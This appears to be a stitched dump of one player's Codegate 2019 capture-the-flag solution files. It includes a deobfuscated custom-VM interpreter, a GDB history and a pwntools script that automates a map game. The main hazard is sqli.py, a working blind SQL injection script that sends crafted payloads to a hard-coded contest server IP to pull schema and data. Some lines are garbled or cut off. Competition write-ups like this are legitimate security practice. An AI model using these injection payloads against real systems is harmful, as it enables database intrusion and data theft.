OO0O00O0OO0OO0000=OO0O00O0OO0OO0000.decode("utf-8") 55 | if OO0O00O0OO0OO0000.isdigit(): 56 | OO0O00O0OO0OO0000=int(OO0O00O0OO0OO0000) 57 | else: 58 | OO0O00O0OO0OO0000=O000O000O00000O0O[OO0O00O0OO0OO0000] 59 | OO0000O00O00OO00O=O000O000O00000O0O[O0O0O0OO0O0O00O00] 60 | OO0000O00O00OO00O=OO0000O00O00OO00O.decode("utf-8") 61 | if OO0000O00O00OO00O.isdigit(): 62 | OO0000O00O00OO00O=int(OO0000O00O00OO00O) 63 | else: 64 | OO0000O00O00OO00O=O000O000O00000O0O[OO0000O00O00OO00O] 65 | O0O0000O000O0OOOO=O0O00000O00OOO000[OO0O00O0OO0OO0000:OO0000O00O00OO00O] 66 | O000O000O00000O0O[O00000O000O0000OO]=O0O0000O000O0OOOO 67 | return 68 | 69 | def SAVE_DICT(O00OOO0OOOOOO0OOO): 70 | O0OOOOOOOO0OOO0O0=O00OOO0OOOOOO0OOO[2001] 71 | O0OOOOOOOO0OOO0O0=O0OOOOOOOO0OOO0O0.decode("utf-8") 72 | 73 | OOO00O0OOO0OO0O00=O00OOO0OOOOOO0OOO[2002] 74 | OOO00O0OOO0OO0O00=OOO00O0OOO0OO0O00.decode("utf-8") 75 | 76 | if OOO00O0OOO0OO0O00.isdigit(): 77 | OOO00O0OOO0OO0O00=int(OOO00O0OOO0OO0O00) 78 | else: 79 | OOO00O0OOO0OO0O00=O00OOO0OOOOOO0OOO[OOO00O0OOO0OO0O00] 80 | 81 | # 두번 째 인자 == key 82 | 83 | OOO0O000O0OOOO000=O00OOO0OOOOOO0OOO[2003] 84 | OOO0O000O0OOOO000=OOO0O000O0OOOO000.decode("utf-8") 85 | 86 | if OOO0O000O0OOOO000.isdigit(): 87 | OOO0O000O0OOOO000=int(OOO0O000O0OOOO000) 88 | else: 89 | OOO0O000O0OOOO000=O00OOO0OOOOOO0OOO[OOO0O000O0OOOO000] 90 | 91 | # 세번 쨰 인자 == ? 
92 | 93 | # [arg1][arg2] = arg3 94 | 95 | O0000OOO0OOO000O0=O00OOO0OOOOOO0OOO[O0OOOOOOOO0OOO0O0] 96 | 97 | O0000OOO0OOO000O0[OOO00O0OOO0OO0O00]=OOO0O000O0OOOO000 98 | return 99 | 100 | def PLUS(OO0O00000O00OO0O0): 101 | OOO0O0O00OOO0O0O0=2001 102 | O0000000O0OOO000O=2002 103 | OOOOO000OOO000000=2003 104 | OOO000O0O00O0OOOO=OO0O00000O00OO0O0[OOO0O0O00OOO0O0O0] 105 | OOO000O0O00O0OOOO=OOO000O0O00O0OOOO.decode("utf-8") 106 | OOO0O0OOOO0O0OOOO=OO0O00000O00OO0O0[O0000000O0OOO000O] 107 | OOO0O0OOOO0O0OOOO=OOO0O0OOOO0O0OOOO.decode("utf-8") 108 | if OOO0O0OOOO0O0OOOO.isdigit(): 109 | OOO0O0OOOO0O0OOOO=int(OOO0O0OOOO0O0OOOO) 110 | else: 111 | OOO0O0OOOO0O0OOOO=OO0O00000O00OO0O0[OOO0O0OOOO0O0OOOO] 112 | O0O000O00OO000O00=OO0O00000O00OO0O0[OOOOO000OOO000000] 113 | O0O000O00OO000O00=O0O000O00OO000O00.decode("utf-8") 114 | if O0O000O00OO000O00.isdigit(): 115 | O0O000O00OO000O00=int(O0O000O00OO000O00) 116 | else: 117 | O0O000O00OO000O00=OO0O00000O00OO0O0[O0O000O00OO000O00] 118 | OOOOO0OO000OO0000=OOO0O0OOOO0O0OOOO+O0O000O00OO000O00 119 | 120 | print("PLUS {} + {}".format(hex(OOO0O0OOOO0O0OOOO), hex(O0O000O00OO000O00))) 121 | OO0O00000O00OO0O0[OOO000O0O00O0OOOO]=OOOOO0OO000OO0000 122 | return 123 | 124 | def XOR_SAVE(_SAVE): 125 | O00O0OOO00O00OOO0=_SAVE[2001] 126 | O00O0OOO00O00OOO0=O00O0OOO00O00OOO0.decode("utf-8") 127 | O0OO0OOOOO0OOOOO0=_SAVE[2002] 128 | O0OO0OOOOO0OOOOO0=O0OO0OOOOO0OOOOO0.decode("utf-8") 129 | 130 | 131 | if O0OO0OOOOO0OOOOO0.isdigit(): 132 | O0OO0OOOOO0OOOOO0=int(O0OO0OOOOO0OOOOO0) 133 | else: 134 | O0OO0OOOOO0OOOOO0=_SAVE[O0OO0OOOOO0OOOOO0] 135 | 136 | OOO0OO000OOO0O0OO=_SAVE[2003] 137 | OOO0OO000OOO0O0OO=OOO0OO000OOO0O0OO.decode("utf-8") 138 | 139 | if OOO0OO000OOO0O0OO.isdigit(): 140 | OOO0OO000OOO0O0OO=int(OOO0OO000OOO0O0OO) 141 | else: 142 | OOO0OO000OOO0O0OO=_SAVE[OOO0OO000OOO0O0OO] 143 | 144 | # print('XOR {} ^ {} ==> {}'.format(O0OO0OOOOO0OOOOO0, OOO0OO000OOO0O0OO, O00O0OOO00O00OOO0)) 145 | print("XOR {} + {}".format(hex(O0OO0OOOOO0OOOOO0), 
hex(OOO0OO000OOO0O0OO))) 146 | xor_result=O0OO0OOOOO0OOOOO0^OOO0OO000OOO0O0OO 147 | 148 | _SAVE[O00O0OOO00O00OOO0]=xor_result 149 | return 150 | 151 | 152 | def AND(OOO00O0O000OO00O0): 153 | O0O0OOO00000OO00O=2001 154 | O0O00000O0O00OO00=2002 155 | OOOO0OOOOO0O00000=2003 156 | O0000O00OO0O0O0OO=OOO00O0O000OO00O0[O0O0OOO00000OO00O] 157 | O0000O00OO0O0O0OO=O0000O00OO0O0O0OO.decode("utf-8") 158 | OO0O0O0OO00O00OO0=OOO00O0O000OO00O0[O0O00000O0O00OO00] 159 | OO0O0O0OO00O00OO0=OO0O0O0OO00O00OO0.decode("utf-8") 160 | if OO0O0O0OO00O00OO0.isdigit(): 161 | OO0O0O0OO00O00OO0=int(OO0O0O0OO00O00OO0) 162 | else: 163 | OO0O0O0OO00O00OO0=OOO00O0O000OO00O0[OO0O0O0OO00O00OO0] 164 | O00OO000O00O0OO00=OOO00O0O000OO00O0[OOOO0OOOOO0O00000] 165 | O00OO000O00O0OO00=O00OO000O00O0OO00.decode("utf-8") 166 | if O00OO000O00O0OO00.isdigit(): 167 | O00OO000O00O0OO00=int(O00OO000O00O0OO00) 168 | else: 169 | O00OO000O00O0OO00=OOO00O0O000OO00O0[O00OO000O00O0OO00] 170 | O000O0O00O00OOOO0=OO0O0O0OO00O00OO0&O00OO000O00O0OO00 171 | print("AND {} + {}".format(hex(OO0O0O0OO00O00OO0), hex(O00OO000O00O0OO00))) 172 | OOO00O0O000OO00O0[O0000O00OO0O0O0OO]=O000O0O00O00OOOO0 173 | return 174 | def OR(OOOOO0O00O0O0O0O0): 175 | O0OOOOO0O000O0O0O=2001 176 | O0O0OOOO000O00O0O=2002 177 | OO00O0OOOO00OOOO0=2003 178 | O0OO00OO00OOOOOO0=OOOOO0O00O0O0O0O0[O0OOOOO0O000O0O0O] 179 | O0OO00OO00OOOOOO0=O0OO00OO00OOOOOO0.decode("utf-8") 180 | O00OOO00O0000O00O=OOOOO0O00O0O0O0O0[O0O0OOOO000O00O0O] 181 | O00OOO00O0000O00O=O00OOO00O0000O00O.decode("utf-8") 182 | if O00OOO00O0000O00O.isdigit(): 183 | O00OOO00O0000O00O=int(O00OOO00O0000O00O) 184 | else: 185 | O00OOO00O0000O00O=OOOOO0O00O0O0O0O0[O00OOO00O0000O00O] 186 | O0000O000000OO000=OOOOO0O00O0O0O0O0[OO00O0OOOO00OOOO0] 187 | O0000O000000OO000=O0000O000000OO000.decode("utf-8") 188 | if O0000O000000OO000.isdigit(): 189 | O0000O000000OO000=int(O0000O000000OO000) 190 | else: 191 | O0000O000000OO000=OOOOO0O00O0O0O0O0[O0000O000000OO000] 192 | 
O0OO0OO0000000O00=O00OOO00O0000O00O|O0000O000000OO000 193 | print("OR {} | {}".format(hex(O00OOO00O0000O00O), hex(O0000O000000OO000))) 194 | OOOOO0O00O0O0O0O0[O0OO00OO00OOOOOO0]=O0OO0OO0000000O00 195 | return 196 | 197 | def RSHIFT(O00OO0OO00O0OOO00): 198 | O0OO0O000OOOOOO00=2001 199 | O0000O0OO00OO0000=2002 200 | OOOOOO00OOOO0O0O0=2003 201 | O0O0O0OO000O0OO0O=O00OO0OO00O0OOO00[O0OO0O000OOOOOO00] 202 | O0O0O0OO000O0OO0O=O0O0O0OO000O0OO0O.decode("utf-8") 203 | O0OOO0OOOOO00O0OO=O00OO0OO00O0OOO00[O0000O0OO00OO0000] 204 | O0OOO0OOOOO00O0OO=O0OOO0OOOOO00O0OO.decode("utf-8") 205 | if O0OOO0OOOOO00O0OO.isdigit(): 206 | O0OOO0OOOOO00O0OO=int(O0OOO0OOOOO00O0OO) 207 | else: 208 | O0OOO0OOOOO00O0OO=O00OO0OO00O0OOO00[O0OOO0OOOOO00O0OO] 209 | O000OO00O0OOO00OO=O00OO0OO00O0OOO00[OOOOOO00OOOO0O0O0] 210 | O000OO00O0OOO00OO=O000OO00O0OOO00OO.decode("utf-8") 211 | if O000OO00O0OOO00OO.isdigit(): 212 | O000OO00O0OOO00OO=int(O000OO00O0OOO00OO) 213 | else: 214 | O000OO00O0OOO00OO=O00OO0OO00O0OOO00[O000OO00O0OOO00OO] 215 | OO0OO0OOOO00O0O0O=O0OOO0OOOOO00O0OO >>O000OO00O0OOO00OO 216 | 217 | print("RSHIFT {} >> {}".format(hex(O0OOO0OOOOO00O0OO), hex(O000OO00O0OOO00OO))) 218 | O00OO0OO00O0OOO00[O0O0O0OO000O0OO0O]=OO0OO0OOOO00O0O0O 219 | return 220 | 221 | def LSHIFT(O0OO00OO000OOO0O0): 222 | OO00O00O0O0O00OO0=2001 223 | OOOOOO0O0OO00OOO0=2002 224 | OO0O00OO0000O0O0O=2003 225 | O000O00O0OOOO0000=O0OO00OO000OOO0O0[OO00O00O0O0O00OO0] 226 | O000O00O0OOOO0000=O000O00O0OOOO0000.decode("utf-8") 227 | OOOO0OOOOO000OOOO=O0OO00OO000OOO0O0[OOOOOO0O0OO00OOO0] 228 | OOOO0OOOOO000OOOO=OOOO0OOOOO000OOOO.decode("utf-8") 229 | if OOOO0OOOOO000OOOO.isdigit(): 230 | OOOO0OOOOO000OOOO=int(OOOO0OOOOO000OOOO) 231 | else: 232 | OOOO0OOOOO000OOOO=O0OO00OO000OOO0O0[OOOO0OOOOO000OOOO] 233 | OOO0OO00OO0O00OOO=O0OO00OO000OOO0O0[OO0O00OO0000O0O0O] 234 | OOO0OO00OO0O00OOO=OOO0OO00OO0O00OOO.decode("utf-8") 235 | if OOO0OO00OO0O00OOO.isdigit(): 236 | OOO0OO00OO0O00OOO=int(OOO0OO00OO0O00OOO) 237 | else: 238 | 
OOO0OO00OO0O00OOO=O0OO00OO000OOO0O0[OOO0OO00OO0O00OOO] 239 | OO00OOOOO0OOOO0OO=OOOO0OOOOO000OOOO<> {}".format(hex(OOOO0OOOOO000OOOO), hex(OOO0OO00OO0O00OOO))) 242 | O0OO00OO000OOO0O0[O000O00O0OOOO0000]=OO00OOOOO0OOOO0OO 243 | return 244 | 245 | def CALL_PYTHON_FUNCTION(OO00OOO000OO00O0O): 246 | O000OO0OOO0OO0000=2001 247 | O0OOO0O0OO0O0OO0O=2002 248 | OOOOO0OO0OOOOO000=1001 249 | OOO0OOO00O00O0OOO=OO00OOO000OO00O0O[O000OO0OOO0OO0000] 250 | OOO0OOO00O00O0OOO=OOO0OOO00O00O0OOO.decode("utf-8") 251 | O0O000O00O0O0000O=OO00OOO000OO00O0O[O0OOO0O0OO0O0OO0O] 252 | O0O000O00O0O0000O=O0O000O00O0O0000O.decode("utf-8") 253 | if O0O000O00O0O0000O.isdigit(): 254 | O0O000O00O0O0000O=int(O0O000O00O0O0000O) 255 | else: 256 | O0O000O00O0O0000O=OO00OOO000OO00O0O[O0O000O00O0O0000O] 257 | 258 | print('PYTHON FUNCTION -> ', OOO0OOO00O00O0OOO) 259 | OO0OOOO000O00OOO0=eval(OOO0OOO00O00O0OOO) 260 | O00O0OO00000OOO0O=OO0OOOO000O00OOO0(O0O000O00O0O0000O) 261 | OO00OOO000OO00O0O[OOOOO0OO0OOOOO000]=O00O0OO00000OOO0O 262 | return 263 | 264 | def O0O000000OO00O00O(OOO0OO0000OO0O0OO): 265 | O00OO0O0O000OOO00=2001 266 | O0OO0O0OO0OOOO0O0=1001 267 | O00O0OOOO00O00O00=OOO0OO0000OO0O0OO[O00OO0O0O000OOO00] 268 | O00O0OOOO00O00O00=O00O0OOOO00O00O00.decode("utf-8") 269 | print('eval', O00O0OOOO00O00O00) 270 | O00OOOO0OOO0O00OO=eval(O00O0OOOO00O00O00) 271 | O0O00OOO000OO0OO0=O00OOOO0OOO0O00OO() 272 | OOO0OO0000OO0O0OO[O0OO0O0OO0OOOO0O0]=O0O00OOO000OO0OO0 273 | return 274 | def O00OO0000OO00OO0O(OOO0OOOO00OO0O000): 275 | OOO0OO0000OO0O0O0=2001 276 | O000O0O0O0O00000O=1001 277 | O00O0OO00O00OOOO0=OOO0OOOO00OO0O000[OOO0OO0000OO0O0O0] 278 | O00O0OO00O00OOOO0=O00O0OO00O00OOOO0.decode("utf-8") 279 | if O00O0OO00O00OOOO0.isdigit(): 280 | O00O0OO00O00OOOO0=int(O00O0OO00O00OOOO0) 281 | else: 282 | O00O0OO00O00OOOO0=OOO0OOOO00OO0O000[O00O0OO00O00OOOO0] 283 | OOO0OOOO00OO0O000[O000O0O0O0O00000O]=O00O0OO00O00OOOO0 284 | return 285 | def SAVE_EVAL_RETURN(O0OOOO00000O00OO0): 286 | O00O0000O0OO00OO0=2001 287 | 
O00O000OO0O0000OO=1001 288 | O0O0O0O0OOOOOO0OO=O0OOOO00000O00OO0[O00O0000O0OO00OO0] 289 | O0O0O0O0OOOOOO0OO=O0O0O0O0OOOOOO0OO.decode("utf-8") 290 | OOOOO000OO0OOOOOO=O0OOOO00000O00OO0[O00O000OO0O0000OO] 291 | O0OOOO00000O00OO0[O0O0O0O0OOOOOO0OO]=OOOOO000OO0OOOOOO 292 | return 293 | 294 | def JUMP_EQUAL(OO000000OO0000000): 295 | OO0O00O0OOO0O0O00=2001 296 | OO0000000O0000OOO=2002 297 | O0O0OOOOOO0O00O00=2003 298 | O0OOO0OO0OOO00OO0=1000 299 | O0000O0OOO0O0OOOO=OO000000OO0000000[OO0O00O0OOO0O0O00] 300 | O0000O0OOO0O0OOOO=O0000O0OOO0O0OOOO.decode("utf-8") 301 | O0000O0OOO0O0OOOO=int(O0000O0OOO0O0OOOO) 302 | OO0O00OO0O0OO0000=OO000000OO0000000[OO0000000O0000OOO] 303 | OO0O00OO0O0OO0000=OO0O00OO0O0OO0000.decode("utf-8") 304 | if OO0O00OO0O0OO0000.isdigit(): 305 | OO0O00OO0O0OO0000=int(OO0O00OO0O0OO0000) 306 | else: 307 | OO0O00OO0O0OO0000=OO000000OO0000000[OO0O00OO0O0OO0000] 308 | OOO00OOOOO0000OO0=OO000000OO0000000[O0O0OOOOOO0O00O00] 309 | OOO00OOOOO0000OO0=OOO00OOOOO0000OO0.decode("utf-8") 310 | if OOO00OOOOO0000OO0.isdigit(): 311 | OOO00OOOOO0000OO0=int(OOO00OOOOO0000OO0) 312 | else: 313 | OOO00OOOOO0000OO0=OO000000OO0000000[OOO00OOOOO0000OO0] 314 | 315 | if OO0O00OO0O0OO0000==OOO00OOOOO0000OO0: 316 | OO000000OO0000000[O0OOO0OO0OOO00OO0]=O0000O0OOO0O0OOOO 317 | return 318 | 319 | def JUMP_NOT_EQAUL(SAVE_): 320 | O0O0O0OO0OOOO0O0O=SAVE_[2001] 321 | O0O0O0OO0OOOO0O0O=O0O0O0OO0OOOO0O0O.decode("utf-8") 322 | O0O0O0OO0OOOO0O0O=int(O0O0O0OO0OOOO0O0O) 323 | 324 | O0OO000O0O0000O00=SAVE_[2002] 325 | O0OO000O0O0000O00=O0OO000O0O0000O00.decode("utf-8") 326 | if O0OO000O0O0000O00.isdigit(): 327 | O0OO000O0O0000O00=int(O0OO000O0O0000O00) 328 | else: 329 | O0OO000O0O0000O00=SAVE_[O0OO000O0O0000O00] 330 | OO00O000OOO0OOO00=SAVE_[2003] 331 | OO00O000OOO0OOO00=OO00O000OOO0OOO00.decode("utf-8") 332 | 333 | if OO00O000OOO0OOO00.isdigit(): 334 | OO00O000OOO0OOO00=int(OO00O000OOO0OOO00) 335 | else: 336 | print("HERE", OO00O000OOO0OOO00, SAVE_[OO00O000OOO0OOO00]) 337 | 
OO00O000OOO0OOO00=SAVE_[OO00O000OOO0OOO00] 338 | 339 | 340 | print("COMPARE1", O0OO000O0O0000O00 , OO00O000OOO0OOO00) 341 | if O0OO000O0O0000O00 != OO00O000OOO0OOO00: 342 | SAVE_[1000]=O0O0O0OO0OOOO0O0O 343 | return 344 | 345 | def JUMP_RIGHT_GREATER(SAVE_): 346 | OOO0OO0OOO0OO0O00=2001 347 | OO00OOOO0OOOOOOOO=2002 348 | OOOO00OO0OOOO00O0=2003 349 | OOOOO0O0OOO0OOO0O=1000 350 | OO0OOO0O0O0000000=SAVE_[OOO0OO0OOO0OO0O00] 351 | OO0OOO0O0O0000000=OO0OOO0O0O0000000.decode("utf-8") 352 | OO0OOO0O0O0000000=int(OO0OOO0O0O0000000) 353 | O0OOO0O000O00OO0O=SAVE_[OO00OOOO0OOOOOOOO] 354 | O0OOO0O000O00OO0O=O0OOO0O000O00OO0O.decode("utf-8") 355 | if O0OOO0O000O00OO0O.isdigit(): 356 | O0OOO0O000O00OO0O=int(O0OOO0O000O00OO0O) 357 | else: 358 | O0OOO0O000O00OO0O=SAVE_[O0OOO0O000O00OO0O] 359 | OOO0OOO00O0000O0O=SAVE_[OOOO00OO0OOOO00O0] 360 | OOO0OOO00O0000O0O=OOO0OOO00O0000O0O.decode("utf-8") 361 | if OOO0OOO00O0000O0O.isdigit(): 362 | OOO0OOO00O0000O0O=int(OOO0OOO00O0000O0O) 363 | else: 364 | OOO0OOO00O0000O0O=SAVE_[OOO0OOO00O0000O0O] 365 | 366 | print("COMPARE2") 367 | if O0OOO0O000O00OO0O=OO00OOOO00O000OOO: 395 | SAVE_[OO00O0O0O00000OO0]=OO000OOOO00OO0OOO 396 | return 397 | 398 | 399 | def JUMP(SAVE_): 400 | O0OOOOOO0OO0O0OOO=2001 401 | O0O0OOOO0OOO0OO00=1000 402 | O0000OOO0000OO0O0=SAVE_[O0OOOOOO0OO0O0OOO] 403 | O0000OOO0000OO0O0=O0000OOO0000OO0O0.decode("utf-8") 404 | O0000OOO0000OO0O0=int(O0000OOO0000OO0O0) 405 | SAVE_[O0O0OOOO0OOO0OO00]=O0000OOO0000OO0O0 406 | return 407 | 408 | def first_call(code, flag): 409 | SAVE=dict() 410 | 411 | 412 | SAVE[1000]=0 413 | 414 | SAVE[1001]=0 415 | 416 | SAVE["flag"]=flag 417 | 418 | OOO000O0O0OOO0OOO=0 419 | while OOO000O0O0OOO0OOO==0: 420 | PC=SAVE[1000] # Counter 421 | 422 | OP=code[PC] # get_first 423 | 424 | PC=PC+1 425 | 426 | XP=code[PC] 427 | 428 | PC=PC+1 429 | 430 | if 0 2 and OUT[i]['ARGS'][k].count('O') > 2 and OUT[i]['ARGS'][k].isdigit() == False: 58 | if OUT[i]['ARGS'][k] in BOX: 59 | pass 60 | else: 61 | 
BOX[OUT[i]['ARGS'][k]] = FMT.format(COUNT) 62 | COUNT += 1 63 | 64 | OUT[i]['ARGS'][k] = BOX[OUT[i]['ARGS'][k]] 65 | 66 | pprint(OUT) -------------------------------------------------------------------------------- /2019/codegate/rich-project/sqli.py: -------------------------------------------------------------------------------- 1 | from requests import post 2 | import uuid 3 | 4 | def sqli(): 5 | headers = { 6 | 'Content-Type': 'application/x-www-form-urlencoded', 7 | } 8 | 9 | out = '' 10 | 11 | for i in xrange(1, 500): 12 | byte = '' 13 | for ii in xrange(1, 8): 14 | _id = str(uuid.uuid4()).replace('-', '') 15 | _id2 = str(uuid.uuid4()).replace('-', '') 16 | 17 | ''' 18 | ascii(substr(lpad( bin( ord(substr(user(), 1, 1)) ), 0, 7 ),1,1))>0 19 | 20 | limit, where, group 21 | user = db_manager@localhost 22 | db = userdata 23 | 24 | INSERT INTO users values('q!w's)4 p(7%4?b3#"2#r` fu00#sbqt','92429d82a41e930486c6de5ebda9602d55c39986','asdfasdf'), (0x71647322333 25 | 26 | having w=? 27 | 28 | anggimottijuno // asdfasdf 29 | ''' 30 | 31 | query = 'ascii(substr(lpad( bin( ord(substr(0x41, %d, 1)) ), 0, 7 ),%d,1))!=0' % (i, ii) 32 | xx = '(select group_concat(table_name) from information_schema.tables where table_schema=database())' 33 | xx = 'select table_name from information_schema.tables' 34 | 35 | xx = 'select info from information_schema.processlist having info like 0x{}'.format('%junoimisgod%'.encode('hex')) 36 | xx = 'select info from information_schema.processlist having info like 0x{}'.format('%sqli_is_god_fuck%'.encode('hex')) 37 | 38 | # xx = 'select id from user having id like 0x{}'.format('juno'.encode('hex')) 39 | 40 | # xx = 'select table_name from information_schema.tables having table_name like 0x{} and table_schema like 0x{}'.format('%users%'.encode('hex'), 'userdata'.encode('hex')) 41 | 42 | # xx = 'select name from users having name like 0x{}'.format('%anggimottijuno%'.encode('hex')) 43 | 44 | xx = 'select column_name from (select *,@ROWNUM6 := 
@ROWNUM6 +1 as ROWNUM from information_schema.columns, (select @ROWNUM6 := 0) R having table_name=0x7573657273 and ROWNUM=3)x' 45 | 46 | 47 | 48 | xx = 'select id from (select *,@ROWNUM6 := @ROWNUM6 +1 as ROWNUM from users, (select @ROWNUM6 := 0) R having ac like ROWNUM=1)x' 49 | # xx = 'select id from (select * from users having id=0x61646d316e6b796a)x' 50 | 51 | ## 6b7dfbea718383b12b4a0ac4aecd8c7aff78fe21 52 | query = ' substr(lpad(bin(ascii(substr( (%s) , %d, 1))),7,0),%d,1)>0x30 ' % (xx, 2, ii) 53 | # print query 54 | data = { 55 | 'id': _id2, 56 | 'pw': 'asdfasdf', 57 | 'ac': "asdfasdf'), (0x{_id}, 0x{pw}, if(({query}), (select 1 union select 2), 0x41))-- 1".format(_id=_id.encode('hex'), pw='6A204BD89F3C8348AFD5C77C717A097A'.encode('hex'), 58 | query=query, fuck='a'*0) 59 | } 60 | 61 | c = post('http://110.10.147.112/?p=reg', headers=headers, data=data) 62 | if 'error' in c.text: 63 | byte = byte + '0' 64 | elif 'hack' in c.text: 65 | print 'wtf?' 66 | exit(0) 67 | else: 68 | byte = byte + '1' 69 | 70 | out += chr(int(byte, 2)) 71 | print out 72 | 73 | 74 | 75 | 76 | sqli() -------------------------------------------------------------------------------- /2019/codegate_final/2048_map/.gdb_history: -------------------------------------------------------------------------------- 1 | r 2 | vmmap 3 | b *0x00005555555575C5 4 | r 5 | b *0x00005555555571F4 6 | c 7 | ni 8 | x/20gx 0x55555575d260 9 | c 10 | x/20gx 0x5555557d1b30 11 | x/s 0x5555557d1b30 12 | search -t qword 0x5555557d1b30 13 | x/20gx 0x55555575d270 14 | info b 15 | c 16 | ni 17 | ni 18 | c 19 | search -t qword 0x5555557d1730 20 | b *0x00005555555575E1 21 | c 22 | ni 23 | ni 24 | search -t qword 0x0x55555575d270 25 | search -t qword 0x5555557d1730 26 | ni 27 | x/gx 0x5555557d1730 28 | -------------------------------------------------------------------------------- /2019/codegate_final/2048_map/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 
2 | import re 3 | from pprint import pprint 4 | 5 | ansi_escape = re.compile(r'\x1B\[([0-?]*[ -/]*[@-~])') 6 | 7 | 8 | r = remote('110.10.147.125', 20489) 9 | # r = remote('172.17.0.2', 20489) 10 | r.sendline('') 11 | r.sendline('') 12 | 13 | name = '@@@@' 14 | r.sendline(name) 15 | 16 | r.sendline('') 17 | 18 | def get_map(wtfwtf=False): 19 | MAP = range(22) 20 | 21 | r.recvuntil('o----------------------------------------------------------o') 22 | 23 | data = r.recvuntil('o----------------------------------------------------------o').replace('\x1b[47m#', 'J').split('\n') 24 | 25 | index = 0 26 | for x in data[1:-1]: 27 | # re.compile(r'\x1b\[\d{1,2}+X').sub('', x) 28 | # _ = repr(re.compile(r'\x1b\[\d+X').findall('juno${0}', x)) 29 | for _ in re.findall(r'\x1b\[\d+X', x): 30 | x = x.replace(_, ' ' * int(_.split('\x1b[')[1].split('X')[0])) 31 | 32 | MAP[index] = bytearray(ansi_escape.sub('', x).split('|\x1b(B')[0][1:]) 33 | index += 1 34 | 35 | if wtfwtf == True: 36 | pprint(data) 37 | 38 | return MAP 39 | 40 | def bfs(grid, start, goal, go=0): 41 | # go = 1 -> next 42 | # go = -1 -> prev 43 | queue = collections.deque([[start]]) 44 | seen = set([start]) 45 | 46 | if go != 0: 47 | ban = bytearray('><:msabcdezxv ') 48 | else: 49 | ban = bytearray(':msabcdezxv ') 50 | 51 | while queue: 52 | path = queue.popleft() 53 | x, y = path[-1] 54 | 55 | if grid[y][x] == goal: 56 | return path 57 | 58 | for x2, y2 in ((x+1,y), (x-1,y), (x,y+1), (x,y-1)): 59 | if 0 <= x2 < 58 and 0 <= y2 < 22 and grid[y2][x2] in ban and (x2, y2) not in seen: 60 | queue.append(path + [(x2, y2)]) 61 | seen.add((x2, y2)) 62 | 63 | 64 | print 'done' 65 | 66 | def make_path(_): 67 | if _ is None: 68 | return None 69 | ` 70 | p1 = _[0][0] 71 | p2 = _[0][1] 72 | 73 | s = '' 74 | 75 | print _ 76 | 77 | for i in xrange(1, len(_)): 78 | if _[i][0] + 1 == p1: 79 | s += 'h' 80 | elif _[i][0] - 1 == p1: 81 | s += 'k' 82 | elif _[i][1] + 1 == p2: 83 | s += 'u' 84 | elif _[i][1] - 1 == p2: 85 | s += 'j' 86 | 
else: 87 | print 'wtf?' 88 | 89 | p1 = _[i][0] 90 | p2 = _[i][1] 91 | 92 | 93 | # s += 'g' 94 | 95 | print 'path!', s 96 | return s 97 | 98 | 99 | 100 | 101 | def find_path(_map, what, go=0): 102 | table = ":msabcdezxv " 103 | 104 | # get my path 105 | for i in xrange(len(_map)): 106 | my_rc = _map[i].find('J') 107 | if my_rc != -1: 108 | break 109 | 110 | # print i, my_rc 111 | 112 | if what in '<>': 113 | go = 1 114 | 115 | return make_path(bfs(_map, (my_rc, i), ord(what), go)) 116 | 117 | 118 | get_map() 119 | 120 | def action(what): 121 | _ = get_map() 122 | 123 | path = find_path(_, what) 124 | 125 | if path is None: 126 | return None 127 | 128 | len_path = len(path) 129 | if what in 'abcde': 130 | path = path+'g' 131 | elif what in '<>': 132 | len_path 133 | elif what == 'm': 134 | path += 'm' 135 | 136 | 137 | r.sendline(path) 138 | 139 | for i in xrange(len_path): 140 | get_map() 141 | 142 | return True 143 | 144 | 145 | # count = 0 146 | 147 | # while True: 148 | # if action('e') is None: 149 | # print 'none..' 
150 | # _ = get_map() 151 | # action('>') 152 | # r.sendline('h') 153 | # else: 154 | # count += 1 155 | 156 | # if count == 10: 157 | # break 158 | 159 | action('e') 160 | action('>') 161 | action('<') 162 | 163 | for i in xrange(5): 164 | action('e') 165 | action('>') 166 | action('<') 167 | r.sendline('h') 168 | get_map() 169 | get_map() 170 | 171 | action('>') 172 | action('>') 173 | 174 | ################# 175 | action('m') 176 | r.sendline('0') 177 | r.sendline('1') 178 | r.sendline('m') 179 | r.sendline('2') 180 | r.sendline('3') 181 | r.sendline('m') 182 | r.sendline('4') 183 | r.sendline('5') 184 | r.sendline('m') 185 | r.sendline('0') 186 | r.sendline('2') 187 | 188 | for i in xrange(11): 189 | print 'done', i 190 | get_map() 191 | 192 | ################# second phase 193 | 194 | for i in xrange(4): 195 | action('e') 196 | action('>') 197 | action('<') 198 | # r.sendline('h') 199 | get_map() 200 | # get_map() 201 | 202 | 203 | ################# 204 | action('m') 205 | r.sendline('1') 206 | r.sendline('2') 207 | r.sendline('m') 208 | r.sendline('3') 209 | r.sendline('5') 210 | r.sendline('m') 211 | r.sendline('1') 212 | r.sendline('3') 213 | 214 | r.sendline('m') # 128, 128 215 | r.sendline('0') 216 | r.sendline('1') 217 | 218 | for i in xrange(8 + 3): 219 | print 'done', i 220 | get_map() 221 | 222 | 223 | ######### third phase 224 | for i in xrange(4): 225 | print 'done', i 226 | action('e') 227 | action('>') 228 | action('<') 229 | # r.sendline('h') 230 | get_map() 231 | # get_map() 232 | 233 | ################# 234 | action('m') 235 | r.sendline('1') 236 | r.sendline('2') 237 | r.sendline('m') 238 | r.sendline('3') 239 | r.sendline('5') 240 | 241 | for i in xrange(5): 242 | print 'done', i 243 | get_map() 244 | 245 | ################# 246 | action('m') 247 | r.sendline('1') 248 | r.sendline('3') 249 | 250 | for i in xrange(2): 251 | print 'done', i 252 | get_map() 253 | 254 | 255 | 256 | ######### fourth phase 257 | for i in xrange(3): 258 | 
action('e') 259 | action('>') 260 | action('<') 261 | get_map() 262 | 263 | ################# 264 | action('m') 265 | r.sendline('2') 266 | r.sendline('3') 267 | r.sendline('m') 268 | r.sendline('2') 269 | r.sendline('4') 270 | 271 | r.sendline('m') 272 | r.sendline('1') 273 | r.sendline('2') 274 | 275 | r.sendline('m') 276 | r.sendline('0') 277 | r.sendline('1') 278 | 279 | for i in xrange(11): 280 | print 'done', i 281 | get_map() 282 | 283 | 284 | ######### fifth phase 285 | for i in xrange(4): 286 | action('e') 287 | action('>') 288 | action('<') 289 | get_map() 290 | 291 | ################# 292 | action('m') 293 | r.sendline('1') 294 | r.sendline('2') 295 | r.sendline('m') 296 | r.sendline('3') 297 | r.sendline('4') 298 | r.sendline('m') 299 | r.sendline('1') 300 | r.sendline('3') 301 | 302 | for i in xrange(8): 303 | print 'done', i 304 | get_map() 305 | 306 | 307 | ######### sixth phase 308 | for i in xrange(3): 309 | action('e') 310 | action('>') 311 | 